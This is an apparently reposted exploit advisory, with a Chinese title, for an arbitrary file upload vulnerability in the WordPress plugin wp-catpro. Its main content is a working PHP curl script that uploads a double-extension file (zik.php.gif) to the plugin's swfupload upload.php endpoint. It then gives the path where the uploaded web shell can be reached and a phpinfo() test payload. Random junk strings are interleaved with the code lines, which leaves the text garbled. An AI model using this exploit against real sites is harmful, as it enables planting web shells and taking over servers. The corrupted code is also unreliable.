WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
; |3 a+ n; h2 |7 P" t: g
/ [, k; l- Q- i. A) z) e" F#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
1 H- s, [2 Q5 u" l# ("jpg", "gif", "png")  // Allowed file extensions
! t& E; [+ t. f/ Y2 W. j% M# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
7 I9 s" C) O- B. ^, o# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
/ w  o, `8 M' F) p  ?0 A( _4 V------------------
0 y7 @- k% F+ j# G6 q
#=> Exploit
+ v. R# `0 [8 Q-----------
<?php
( U9 ]# P2 p1 W% y' z
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
- |$ U3 r7 H0 p  m- }1 ?, U# P0 O'folder'=>'/wp-content/uploads/catpro/'));
* s9 r. p% B" B8 Xcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  ~3 S9 V) L+ z. M! W  n9 }$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
! V$ k  }( }0 B  f
& M& S- w" Q0 _6 X, N0 P2 ~Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
" R7 P/ T1 w8 B$ s3 I! T/ Bphpinfo();
& E. i+ N2 d. c  z& S?>